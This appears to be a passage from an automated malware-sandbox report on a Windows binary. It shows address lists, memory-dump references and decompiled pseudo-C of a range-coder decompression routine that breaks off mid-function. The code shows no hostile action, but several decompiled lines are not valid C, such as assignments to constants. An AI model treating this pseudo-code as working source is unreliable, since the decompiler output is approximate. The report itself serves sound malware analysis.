                                                0x004063da
                                                0x004063dd
                                                0x004063e0
                                                0x004063e2
                                                0x004063e2
                                                0x004063e2
                                                0x00000000
                                                0x00000000
                                                0x00406544
                                                0x00406544
                                                0x00406548
                                                0x00406a0e
                                                0x00000000
                                                0x00406a0e
                                                0x0040654e
                                                0x00406551
                                                0x00406554
                                                0x00406557
                                                0x00406559
                                                0x00406559
                                                0x00406559
                                                0x0040655c
                                                0x0040655f
                                                0x00406562
                                                0x00406565
                                                0x00406568
                                                0x0040656b
                                                0x0040656c
                                                0x0040656e
                                                0x0040656e
                                                0x0040656e
                                                0x00406571
                                                0x00406574
                                                0x00406577
                                                0x0040657a
                                                0x0040657a
                                                0x0040657a
                                                0x0040657d
                                                0x0040657f
                                                0x0040657f
                                                0x00000000
                                                0x00000000
                                                0x004067c1
                                                0x004067c1
                                                0x004067c1
                                                0x004067c5
                                                0x00000000
                                                0x00000000
                                                0x004067cb
                                                0x004067ce
                                                0x004067d1
                                                0x004067d4
                                                0x004067d6
                                                0x004067d6
                                                0x004067d6
                                                0x004067d9
                                                0x004067dc
                                                0x004067df
                                                0x004067e2
                                                0x004067e5
                                                0x004067e8
                                                0x004067e9
                                                0x004067eb
                                                0x004067eb
                                                0x004067eb
                                                0x004067ee
                                                0x004067f1
                                                0x004067f4
                                                0x004067f7
                                                0x004067fa
                                                0x004067fe
                                                0x00406800
                                                0x00406803
                                                0x00000000
                                                0x00406805
                                                0x00406582
                                                0x00406582
                                                0x00000000
                                                0x00406582
                                                0x00406803
                                                0x00406a38
                                                0x00000000
                                                0x00000000
                                                0x00406067
                                                0x00406a6f
                                                0x00406a6f
                                                0x00000000
                                                0x00406a6f
                                                0x004068bc
                                                0x00406843
                                                0x00406840
                                                0x00000000
                                                0x00406477

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 17d2eea9f7cdce8bc4a623307af2d8c55e83d6c30150793070c9d330b5787031
                                                • Instruction ID: ed496f49c15cb1a0cee1f91230a4d4bd76d3fd25087baa69d2252d5f7e71f344
                                                • Opcode Fuzzy Hash: 17d2eea9f7cdce8bc4a623307af2d8c55e83d6c30150793070c9d330b5787031
                                                • Instruction Fuzzy Hash: 30713271E00228CFDF28DFA8C8547ADBBB1FB44305F15806AD906BB281D7785A96DF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406591, Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 98%
                                                			E00406591() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8)); // executed
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
